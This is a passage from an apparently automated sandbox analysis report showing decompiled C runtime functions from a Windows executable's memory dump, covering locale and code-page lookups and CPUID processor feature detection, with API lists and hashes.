                    0x0141397e
                    0x01413981
                    0x00000000
                    0x01413983
                    0x01413986
                    0x0141398e
                    0x0141398e
                    0x01413981
                    0x01413963
                    0x01413963
                    0x0141396a
                    0x0141396b
                    0x0141396d
                    0x01413972
                    0x01413972
                    0x01413958
                    0x01413958
                    0x01413958
                    0x014139cb
                    0x01413917
                    0x01413917
                    0x01413917
                    0x01413921
                    0x0141392a
                    0x0141392f
                    0x0141393d
                    0x0141393d
                    0x01413915
                    0x0141261e

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: cdb79c9a11c37909341a3f50ca16a791dd24aa78a3e52f2e05a9d446b0a8ab51
                    • Instruction ID: 94e21faff75bc91981c62d22f59bb1e6e4cf045aba2a4755c810f5d9343e7b3e
                    • Opcode Fuzzy Hash: cdb79c9a11c37909341a3f50ca16a791dd24aa78a3e52f2e05a9d446b0a8ab51
                    • Instruction Fuzzy Hash: 90C23771E086298BDB25CE28DD40BEAB7B5FB48314F1441EBD94DE7258E774AE818F40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0140FC17(void* __ecx, signed int _a4, intOrPtr _a8) {
                    				short _v8;
                    				short _t17;
                    				signed int _t18;
                    				signed int _t23;
                    				signed int _t25;
                    				signed int _t26;
                    				signed int _t27;
                    				void* _t30;
                    				void* _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr* _t36;
                    				intOrPtr* _t37;
                    
                    				_push(__ecx);
                    				_t23 = _a4;
                    				if(_t23 == 0) {
                    					L21:
                    					_t12 = _a8 + 8; // 0xfde8fe81
                    					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
                    						_t17 = _v8;
                    						if(_t17 == 0) {
                    							_t17 = GetACP();
                    						}
                    						L25:
                    						return _t17;
                    					}
                    					L22:
                    					_t17 = 0;
                    					goto L25;
                    				}
                    				_t18 = 0;
                    				if( *_t23 == 0) {
                    					goto L21;
                    				}
                    				_t36 = 0x14297a0;
                    				_t25 = _t23;
                    				while(1) {
                    					_t30 =  *_t25;
                    					if(_t30 !=  *_t36) {
                    						break;
                    					}
                    					if(_t30 == 0) {
                    						L7:
                    						_t26 = _t18;
                    						L9:
                    						if(_t26 == 0) {
                    							goto L21;
                    						}
                    						_t37 = 0x14297a8;
                    						_t27 = _t23;
                    						while(1) {
                    							_t31 =  *_t27;
                    							if(_t31 !=  *_t37) {
                    								break;
                    							}
                    							if(_t31 == 0) {
                    								L17:
                    								if(_t18 != 0) {
                    									_t17 = E0140663B(_t23, _t23);
                    									goto L25;
                    								}
                    								_t8 = _a8 + 8; // 0xfde8fe81
                    								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
                    									goto L22;
                    								}
                    								_t17 = _v8;
                    								goto L25;
                    							}
                    							_t32 =  *((intOrPtr*)(_t27 + 2));
                    							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                    								break;
                    							}
                    							_t27 = _t27 + 4;
                    							_t37 = _t37 + 4;
                    							if(_t32 != 0) {
                    								continue;
                    							}
                    							goto L17;
                    						}
                    						asm("sbb eax, eax");
                    						_t18 = _t18 | 0x00000001;
                    						goto L17;
                    					}
                    					_t33 =  *((intOrPtr*)(_t25 + 2));
                    					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                    						break;
                    					}
                    					_t25 = _t25 + 4;
                    					_t36 = _t36 + 4;
                    					if(_t33 != 0) {
                    						continue;
                    					}
                    					goto L7;
                    				}
                    				asm("sbb edx, edx");
                    				_t26 = _t25 | 0x00000001;
                    				goto L9;
                    			}
















                    0x0140fc1c
                    0x0140fc1d
                    0x0140fc24
                    0x0140fcc8
                    0x0140fcd6
                    0x0140fce1
                    0x0140fce7
                    0x0140fcec
                    0x0140fcee
                    0x0140fcee
                    0x0140fcf4
                    0x0140fcf9
                    0x0140fcf9
                    0x0140fce3
                    0x0140fce3
                    0x00000000
                    0x0140fce3
                    0x0140fc2a
                    0x0140fc2f
                    0x00000000
                    0x00000000
                    0x0140fc35
                    0x0140fc3a
                    0x0140fc3c
                    0x0140fc3c
                    0x0140fc42
                    0x00000000
                    0x00000000
                    0x0140fc47
                    0x0140fc5e
                    0x0140fc5e
                    0x0140fc67
                    0x0140fc69
                    0x00000000
                    0x00000000
                    0x0140fc6b
                    0x0140fc70
                    0x0140fc72
                    0x0140fc72
                    0x0140fc78
                    0x00000000
                    0x00000000
                    0x0140fc7d
                    0x0140fc9b
                    0x0140fc9d
                    0x0140fcc0
                    0x00000000
                    0x0140fcc5
                    0x0140fcad
                    0x0140fcb8
                    0x00000000
                    0x00000000
                    0x0140fcba
                    0x00000000
                    0x0140fcba
                    0x0140fc7f
                    0x0140fc87
                    0x00000000
                    0x00000000
                    0x0140fc89
                    0x0140fc8c
                    0x0140fc92
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140fc94
                    0x0140fc96
                    0x0140fc98
                    0x00000000
                    0x0140fc98
                    0x0140fc49
                    0x0140fc51
                    0x00000000
                    0x00000000
                    0x0140fc53
                    0x0140fc56
                    0x0140fc5c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140fc5c
                    0x0140fc62
                    0x0140fc64
                    0x00000000

                    APIs
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0140FF36,?,00000000), ref: 0140FCB0
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0140FF36,?,00000000), ref: 0140FCD9
                    • GetACP.KERNEL32(?,?,0140FF36,?,00000000), ref: 0140FCEE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: 1b75ce617caec489922823eb88eee0c105f97e9c0f1729a5a628fed564bbbf8d
                    • Instruction ID: 98c7b201a67d230357b783c8511301f7bcf753768a078a9b4c5b7c115135d206
                    • Opcode Fuzzy Hash: 1b75ce617caec489922823eb88eee0c105f97e9c0f1729a5a628fed564bbbf8d
                    • Instruction Fuzzy Hash: F321D83260C101ABD737CF2AC906A9777A6BF44A54B568436ED0AD73A1E732DD49C350
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0140FDEB(void* __ecx, void* __edx, signed int _a4, short* _a8, short* _a12) {
                    				signed int _v8;
                    				int _v12;
                    				int _v16;
                    				char _v20;
                    				signed int* _v24;
                    				short* _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t39;
                    				void* _t45;
                    				signed int* _t46;
                    				signed int _t47;
                    				short* _t48;
                    				int _t49;
                    				void* _t53;
                    				short* _t56;
                    				short* _t57;
                    				short* _t58;
                    				int _t65;
                    				int _t67;
                    				short* _t71;
                    				intOrPtr _t74;
                    				void* _t76;
                    				short* _t77;
                    				intOrPtr _t84;
                    				short* _t87;
                    				short* _t90;
                    				void* _t92;
                    				short** _t99;
                    				short* _t100;
                    				signed int _t101;
                    				signed short _t104;
                    				signed int _t105;
                    				void* _t106;
                    
                    				_t39 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t39 ^ _t105;
                    				_t87 = _a12;
                    				_t101 = _a4;
                    				_v28 = _a8;
                    				_v24 = E01406A01(_t87, __ecx, __edx) + 0x50;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_t45 = E01406A01(_t87, __ecx, __edx);
                    				_t97 = 0;
                    				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                    				_t90 = _t101 + 0x80;
                    				_t46 = _v24;
                    				 *_t46 = _t101;
                    				_t99 =  &(_t46[1]);
                    				 *_t99 = _t90;
                    				if(_t90 != 0 &&  *_t90 != 0) {
                    					_t84 =  *0x142979c; // 0x17
                    					E0140FD8E(0, 0x1429688, _t84 - 1, _t99);
                    					_t46 = _v24;
                    					_t106 = _t106 + 0xc;
                    					_t97 = 0;
                    				}
                    				_v20 = _t97;
                    				_t47 =  *_t46;
                    				if(_t47 == 0 ||  *_t47 == _t97) {
                    					_t48 =  *_t99;
                    					__eflags = _t48;
                    					if(_t48 == 0) {
                    						L19:
                    						_v20 = 0x104;
                    						_t49 = GetUserDefaultLCID();
                    						_v12 = _t49;
                    						_v16 = _t49;
                    						goto L20;
                    					}
                    					__eflags =  *_t48 - _t97;
                    					if( *_t48 == _t97) {
                    						goto L19;
                    					}
                    					E0140F72B(_t90, _t97,  &_v20);
                    					_pop(_t90);
                    					goto L20;
                    				} else {
                    					_t71 =  *_t99;
                    					if(_t71 == 0 ||  *_t71 == _t97) {
                    						E0140F811(_t90, _t97,  &_v20);
                    					} else {
                    						E0140F776(_t90, _t97,  &_v20);
                    					}
                    					_pop(_t90);
                    					if(_v20 != 0) {
                    						_t100 = 0;
                    						__eflags = 0;
                    						goto L25;
                    					} else {
                    						_t74 =  *0x1429684; // 0x41
                    						_t76 = E0140FD8E(_t97, 0x1429378, _t74 - 1, _v24);
                    						_t106 = _t106 + 0xc;
                    						if(_t76 == 0) {
                    							L20:
                    							_t100 = 0;
                    							__eflags = 0;
                    							L21:
                    							if(_v20 != 0) {
                    								L25:
                    								asm("sbb esi, esi");
                    								_t104 = E0140FC17(_t90,  ~_t101 & _t101 + 0x00000100,  &_v20);
                    								_pop(_t92);
                    								__eflags = _t104;
                    								if(_t104 == 0) {
                    									goto L22;
                    								}
                    								__eflags = _t104 - 0xfde8;
                    								if(_t104 == 0xfde8) {
                    									goto L22;
                    								}
                    								__eflags = _t104 - 0xfde9;
                    								if(_t104 == 0xfde9) {
                    									goto L22;
                    								}
                    								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
                    								__eflags = _t56;
                    								if(_t56 == 0) {
                    									goto L22;
                    								}
                    								_t57 = IsValidLocale(_v16, 1);
                    								__eflags = _t57;
                    								if(_t57 == 0) {
                    									goto L22;
                    								}
                    								_t58 = _v28;
                    								__eflags = _t58;
                    								if(__eflags != 0) {
                    									 *_t58 = _t104;
                    								}
                    								E014071BA(_t87, _t92, _t100, __eflags, _v16,  &(_v24[0x94]), 0x55, _t100);
                    								__eflags = _t87;
                    								if(__eflags == 0) {
                    									L36:
                    									_t53 = 1;
                    									L23:
                    									return E013F268B(_t53, _v8 ^ _t105);
                    								}
                    								_t33 =  &(_t87[0x90]); // 0x14051f7
                    								E014071BA(_t87, _t92, _t100, __eflags, _v16, _t33, 0x55, _t100);
                    								_t65 = GetLocaleInfoW(_v16, 0x1001, _t87, 0x40);
                    								__eflags = _t65;
                    								if(_t65 == 0) {
                    									goto L22;
                    								}
                    								_t36 =  &(_t87[0x40]); // 0x1405157
                    								_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                    								__eflags = _t67;
                    								if(_t67 == 0) {
                    									goto L22;
                    								}
                    								_t38 =  &(_t87[0x80]); // 0x14051d7
                    								E014142F3(_t38, _t104, _t38, 0x10, 0xa);
                    								goto L36;
                    							}
                    							L22:
                    							_t53 = 0;
                    							goto L23;
                    						}
                    						_t77 =  *_t99;
                    						_t100 = 0;
                    						if(_t77 == 0 ||  *_t77 == 0) {
                    							E0140F811(_t90, _t97,  &_v20);
                    						} else {
                    							E0140F776(_t90, _t97,  &_v20);
                    						}
                    						_pop(_t90);
                    						goto L21;
                    					}
                    				}
                    			}






































                    0x0140fdf3
                    0x0140fdfa
                    0x0140fe01
                    0x0140fe05
                    0x0140fe09
                    0x0140fe17
                    0x0140fe1c
                    0x0140fe1d
                    0x0140fe1e
                    0x0140fe1f
                    0x0140fe27
                    0x0140fe29
                    0x0140fe2f
                    0x0140fe35
                    0x0140fe38
                    0x0140fe3a
                    0x0140fe3d
                    0x0140fe41
                    0x0140fe48
                    0x0140fe55
                    0x0140fe5a
                    0x0140fe5d
                    0x0140fe60
                    0x0140fe60
                    0x0140fe62
                    0x0140fe65
                    0x0140fe69
                    0x0140fed9
                    0x0140fedb
                    0x0140fedd
                    0x0140fef0
                    0x0140fef0
                    0x0140fef7
                    0x0140fefd
                    0x0140ff00
                    0x00000000
                    0x0140ff00
                    0x0140fedf
                    0x0140fee2
                    0x00000000
                    0x00000000
                    0x0140fee8
                    0x0140feed
                    0x00000000
                    0x0140fe70
                    0x0140fe70
                    0x0140fe74
                    0x0140fe8a
                    0x0140fe7b
                    0x0140fe7f
                    0x0140fe7f
                    0x0140fe93
                    0x0140fe94
                    0x0140ff1e
                    0x0140ff1e
                    0x00000000
                    0x0140fe9a
                    0x0140fe9a
                    0x0140fea9
                    0x0140feae
                    0x0140feb3
                    0x0140ff03
                    0x0140ff03
                    0x0140ff03
                    0x0140ff05
                    0x0140ff09
                    0x0140ff20
                    0x0140ff2c
                    0x0140ff36
                    0x0140ff39
                    0x0140ff3a
                    0x0140ff3c
                    0x00000000
                    0x00000000
                    0x0140ff3e
                    0x0140ff44
                    0x00000000
                    0x00000000
                    0x0140ff46
                    0x0140ff4c
                    0x00000000
                    0x00000000
                    0x0140ff52
                    0x0140ff58
                    0x0140ff5a
                    0x00000000
                    0x00000000
                    0x0140ff61
                    0x0140ff67
                    0x0140ff69
                    0x00000000
                    0x00000000
                    0x0140ff6b
                    0x0140ff6e
                    0x0140ff70
                    0x0140ff72
                    0x0140ff72
                    0x0140ff83
                    0x0140ff88
                    0x0140ff8a
                    0x0140ffea
                    0x0140ffec
                    0x0140ff0d
                    0x0140ff1d
                    0x0140ff1d
                    0x0140ff8f
                    0x0140ff99
                    0x0140ffa9
                    0x0140ffaf
                    0x0140ffb1
                    0x00000000
                    0x00000000
                    0x0140ffb9
                    0x0140ffc8
                    0x0140ffce
                    0x0140ffd0
                    0x00000000
                    0x00000000
                    0x0140ffda
                    0x0140ffe2
                    0x00000000
                    0x0140ffe7
                    0x0140ff0b
                    0x0140ff0b
                    0x00000000
                    0x0140ff0b
                    0x0140feb5
                    0x0140feb7
                    0x0140febb
                    0x0140fed1
                    0x0140fec2
                    0x0140fec6
                    0x0140fec6
                    0x0140fed6
                    0x00000000
                    0x0140fed6
                    0x0140fe94

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A60
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0140FEF7
                    • IsValidCodePage.KERNEL32(00000000), ref: 0140FF52
                    • IsValidLocale.KERNEL32(?,00000001), ref: 0140FF61
                    • GetLocaleInfoW.KERNEL32(?,00001001,014050D7,00000040,?,014051F7,00000055,00000000,?,?,00000055,00000000), ref: 0140FFA9
                    • GetLocaleInfoW.KERNEL32(?,00001002,01405157,00000040), ref: 0140FFC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                    • String ID:
                    • API String ID: 745075371-0
                    • Opcode ID: 01b6e1f6bbfa966b0d76421174583699c18c1fdac3422c599aafd2fa13588d5b
                    • Instruction ID: 47025c51da060e300029977a28076e2bddd8c1f422b73694748a101e332d34b2
                    • Opcode Fuzzy Hash: 01b6e1f6bbfa966b0d76421174583699c18c1fdac3422c599aafd2fa13588d5b
                    • Instruction Fuzzy Hash: 445172719002169BEB32DFAACC40ABB77B8BF55700F14447BEA15D72E0E77099498BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E013EFE10(intOrPtr __edx, void* __ebp) {
                    				signed int _v4;
                    				signed int _v8;
                    				signed int _v12;
                    				unsigned int _v16;
                    				signed int _v20;
                    				signed char _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				signed char _v36;
                    				signed int _v40;
                    				signed char _v44;
                    				unsigned int _v48;
                    				void* _v52;
                    				signed int _t83;
                    				char _t87;
                    				intOrPtr _t88;
                    				signed int _t93;
                    				intOrPtr _t116;
                    				signed int _t119;
                    				unsigned int _t126;
                    				unsigned int _t132;
                    				intOrPtr _t135;
                    				intOrPtr* _t136;
                    				intOrPtr* _t137;
                    				intOrPtr* _t138;
                    				intOrPtr* _t139;
                    				signed int _t140;
                    				intOrPtr* _t142;
                    				intOrPtr* _t143;
                    
                    				_t135 = __edx;
                    				_t146 =  &_v52;
                    				_t83 =  *0x1435234; // 0x78d9f939
                    				_v4 = _t83 ^  &_v52;
                    				_v36 = 0;
                    				_v24 = 0;
                    				asm("cpuid");
                    				_t138 =  &_v36;
                    				_v8 = 0;
                    				asm("xorps xmm0, xmm0");
                    				_v20 = 0;
                    				asm("movq [esp+0x20], xmm0");
                    				 *_t138 = 0;
                    				 *((intOrPtr*)(_t138 + 4)) = _t116;
                    				 *((intOrPtr*)(_t138 + 8)) = 0;
                    				asm("movq [esp+0x30], xmm0");
                    				 *((intOrPtr*)(_t138 + 0xc)) = __edx;
                    				_t139 =  &_v20;
                    				asm("cpuid");
                    				 *_t139 = 1;
                    				 *((intOrPtr*)(_t139 + 4)) = _t116;
                    				 *((intOrPtr*)(_t139 + 8)) = 0;
                    				 *((intOrPtr*)(_t139 + 0xc)) = __edx;
                    				_t119 = _v12;
                    				_v52 = 0;
                    				asm("movq [esp+0x10], xmm0");
                    				_v40 = 0;
                    				if((_v8 & 0x04000000) == 0) {
                    					_t87 =  *0x1439b09; // 0x1
                    					if(_t87 == 0) {
                    						L7:
                    						 *0x1439b0a = 0;
                    						L8:
                    						if(_t87 == 0) {
                    							L10:
                    							 *0x1439b0b = 0;
                    							L11:
                    							if(_t87 == 0) {
                    								L13:
                    								 *0x1439b0c = 0;
                    								L14:
                    								if(_t87 == 0) {
                    									L16:
                    									 *0x1439b0d = 0;
                    									L17:
                    									if(_t87 == 0) {
                    										L19:
                    										 *0x1439b0e = 0;
                    										L20:
                    										_t88 = _v32;
                    										if(_t88 != 0x756e6547) {
                    											if(_t88 != 0x68747541) {
                    												if(_t88 == 0x746e6543 && _v28 == 0x736c7561 && _v24 == 0x48727561) {
                    													_t142 =  &_v52;
                    													asm("cpuid");
                    													 *_t142 = 0xc0000000;
                    													 *((intOrPtr*)(_t142 + 4)) = _t116;
                    													 *((intOrPtr*)(_t142 + 8)) = 0;
                    													 *((intOrPtr*)(_t142 + 0xc)) = _t135;
                    													if(_v52 >= 0xc0000001) {
                    														asm("cpuid");
                    														 *_t142 = 0xc0000001;
                    														 *((intOrPtr*)(_t142 + 4)) = _t116;
                    														 *((intOrPtr*)(_t142 + 8)) = 0;
                    														 *((intOrPtr*)(_t142 + 0xc)) = _t135;
                    														_t93 = _v40;
                    														 *0x1439b14 = (_v40 & 0x0000000c) != 0;
                    														 *0x1439b15 = (_v40 & 0x000000c0) != 0;
                    														 *0x1439b16 = (_t93 & 0x00000300) != 0;
                    														 *0x1439b17 = (_t93 & 0x00000c00) != 0;
                    														 *0x1439b18 = (_t93 & 0x00003000) != 0;
                    													}
                    												}
                    												L35:
                    												_t140 =  *0x1435198; // 0x40
                    												L36:
                    												_t141 =  ==  ? 0x20 : _t140;
                    												 *0x1435198 =  ==  ? 0x20 : _t140;
                    												 *0x1439b08 = 1;
                    												return E013F268B(0x20, _v4 ^ _t146);
                    											}
                    											if(_v28 != 0x444d4163 || _v24 != 0x69746e65) {
                    												goto L35;
                    											} else {
                    												_t143 =  &_v52;
                    												asm("cpuid");
                    												 *_t143 = 0x80000005;
                    												 *((intOrPtr*)(_t143 + 4)) = _t116;
                    												 *((intOrPtr*)(_t143 + 8)) = 0;
                    												 *((intOrPtr*)(_t143 + 0xc)) = _t135;
                    												_t140 = _v44 & 0x000000ff;
                    												 *0x1439b12 = _v12 >> 0x0000001e & 0x00000001;
                    												if(_v36 >= 7) {
                    													_t136 =  &_v52;
                    													asm("cpuid");
                    													 *_t136 = 7;
                    													 *((intOrPtr*)(_t136 + 4)) = _t116;
                    													 *((intOrPtr*)(_t136 + 8)) = 0;
                    													 *((intOrPtr*)(_t136 + 0xc)) = _t135;
                    													_t126 = _v48;
                    													 *0x1439b13 = _t126 >> 0x00000012 & 0x00000001;
                    													 *0x1439b10 = _t126 >> 0x00000013 & 0x00000001;
                    													 *0x1439b0f = _t126 >> 0x0000001d & 0x00000001;
                    												}
                    												goto L36;
                    											}
                    										}
                    										if(_v28 != 0x6c65746e || _v24 != 0x49656e69) {
                    											goto L35;
                    										} else {
                    											 *0x1439b11 = (_v20 & 0x00000f00) == 0xf00;
                    											_t140 = (_v16 >> 0x00000008 & 0x000000ff) << 3;
                    											 *0x1439b12 = _t119 >> 0x0000001e & 0x00000001;
                    											if(_v36 >= 7) {
                    												_t137 =  &_v52;
                    												asm("cpuid");
                    												 *_t137 = 7;
                    												 *((intOrPtr*)(_t137 + 4)) = _t116;
                    												 *((intOrPtr*)(_t137 + 8)) = 0;
                    												 *((intOrPtr*)(_t137 + 0xc)) = _t135;
                    												_t132 = _v48;
                    												 *0x1439b13 = _t132 >> 0x00000012 & 0x00000001;
                    												 *0x1439b10 = _t132 >> 0x00000013 & 0x00000001;
                    												 *0x1439b0f = _t132 >> 0x0000001d & 0x00000001;
                    											}
                    											goto L36;
                    										}
                    									}
                    									 *0x1439b0e = 1;
                    									if((_v12 & 0x00000002) != 0) {
                    										goto L20;
                    									}
                    									goto L19;
                    								}
                    								 *0x1439b0d = 1;
                    								if((_t119 & 0x02000000) != 0) {
                    									goto L17;
                    								}
                    								goto L16;
                    							}
                    							 *0x1439b0c = 1;
                    							if((_t119 & 0x00100000) != 0) {
                    								goto L14;
                    							}
                    							goto L13;
                    						}
                    						 *0x1439b0b = 1;
                    						if((_t119 & 0x00080000) != 0) {
                    							goto L11;
                    						}
                    						goto L10;
                    					}
                    					L6:
                    					 *0x1439b0a = 1;
                    					if((_t119 & 0x00000200) != 0) {
                    						goto L8;
                    					}
                    					goto L7;
                    				}
                    				if((_t119 & 0x08000000) != 0) {
                    					L4:
                    					_t87 = 1;
                    					 *0x1439b09 = 1;
                    					goto L6;
                    				}
                    				_t87 = E013F0D90();
                    				_t119 = _v12;
                    				if(_t87 != 0) {
                    					goto L4;
                    				} else {
                    					 *0x1439b09 = _t87;
                    					goto L7;
                    				}
                    			}
































                    0x013efe10
                    0x013efe10
                    0x013efe13
                    0x013efe1a
                    0x013efe23
                    0x013efe2d
                    0x013efe35
                    0x013efe37
                    0x013efe3b
                    0x013efe43
                    0x013efe46
                    0x013efe4e
                    0x013efe54
                    0x013efe5b
                    0x013efe5e
                    0x013efe63
                    0x013efe69
                    0x013efe6c
                    0x013efe70
                    0x013efe72
                    0x013efe74
                    0x013efe77
                    0x013efe7a
                    0x013efe85
                    0x013efe89
                    0x013efe91
                    0x013efe97
                    0x013efe9f
                    0x013efec6
                    0x013efecd
                    0x013efede
                    0x013efede
                    0x013efee5
                    0x013efee7
                    0x013efef8
                    0x013efef8
                    0x013efeff
                    0x013eff01
                    0x013eff12
                    0x013eff12
                    0x013eff19
                    0x013eff1b
                    0x013eff2c
                    0x013eff2c
                    0x013eff33
                    0x013eff35
                    0x013eff45
                    0x013eff45
                    0x013eff4c
                    0x013eff4c
                    0x013eff55
                    0x013efffa
                    0x013f009c
                    0x013f00ba
                    0x013f00c5
                    0x013f00c7
                    0x013f00c9
                    0x013f00cc
                    0x013f00cf
                    0x013f00da
                    0x013f00e3
                    0x013f00e5
                    0x013f00e7
                    0x013f00ea
                    0x013f00ed
                    0x013f00f5
                    0x013f00f9
                    0x013f0105
                    0x013f0111
                    0x013f011d
                    0x013f0129
                    0x013f0129
                    0x013f00da
                    0x013f0130
                    0x013f0130
                    0x013f0136
                    0x013f013e
                    0x013f0141
                    0x013f0148
                    0x013f015e
                    0x013f015e
                    0x013f0008
                    0x00000000
                    0x013f001c
                    0x013f001c
                    0x013f0027
                    0x013f0029
                    0x013f002f
                    0x013f0035
                    0x013f003f
                    0x013f0042
                    0x013f0047
                    0x013f004c
                    0x013f0054
                    0x013f005d
                    0x013f005f
                    0x013f0061
                    0x013f0064
                    0x013f0067
                    0x013f006a
                    0x013f0075
                    0x013f0087
                    0x013f008c
                    0x013f008c
                    0x00000000
                    0x013f004c
                    0x013f0008
                    0x013eff63
                    0x00000000
                    0x013eff77
                    0x013eff89
                    0x013eff9c
                    0x013effa4
                    0x013effaa
                    0x013effb2
                    0x013effbb
                    0x013effbd
                    0x013effbf
                    0x013effc2
                    0x013effc5
                    0x013effc8
                    0x013effd3
                    0x013effe5
                    0x013effea
                    0x013effea
                    0x00000000
                    0x013effaa
                    0x013eff63
                    0x013eff3c
                    0x013eff43
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013eff43
                    0x013eff1d
                    0x013eff2a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013eff2a
                    0x013eff03
                    0x013eff10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013eff10
                    0x013efee9
                    0x013efef6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013efef6
                    0x013efecf
                    0x013efecf
                    0x013efedc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013efedc
                    0x013efea7
                    0x013efebd
                    0x013efebd
                    0x013efebf
                    0x00000000
                    0x013efebf
                    0x013efea9
                    0x013efeae
                    0x013efeb4
                    0x00000000
                    0x013efeb6
                    0x013efeb6
                    0x00000000
                    0x013efeb6

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Auth$Cent$Genu$auls$aurH
                    • API String ID: 0-1000870855
                    • Opcode ID: eb803e67dc29b1f02d346a894d617daf52a1c432ae2ae556ef6ec4409c0fdf05
                    • Instruction ID: 13ac063979815978b6a12518508ea05529e9e6c322f0f100d12623486d910cbc
                    • Opcode Fuzzy Hash: eb803e67dc29b1f02d346a894d617daf52a1c432ae2ae556ef6ec4409c0fdf05
                    • Instruction Fuzzy Hash: FE91AA715193928EE729CF2DD05435ABFE0BB9530CF84892EE8D993396C3B4E944CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E0140F4B3(void* __ecx, void* __edx, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
                    				intOrPtr* _v8;
                    				signed int _v12;
                    				intOrPtr _v40;
                    				signed int _v52;
                    				char _v252;
                    				short _v292;
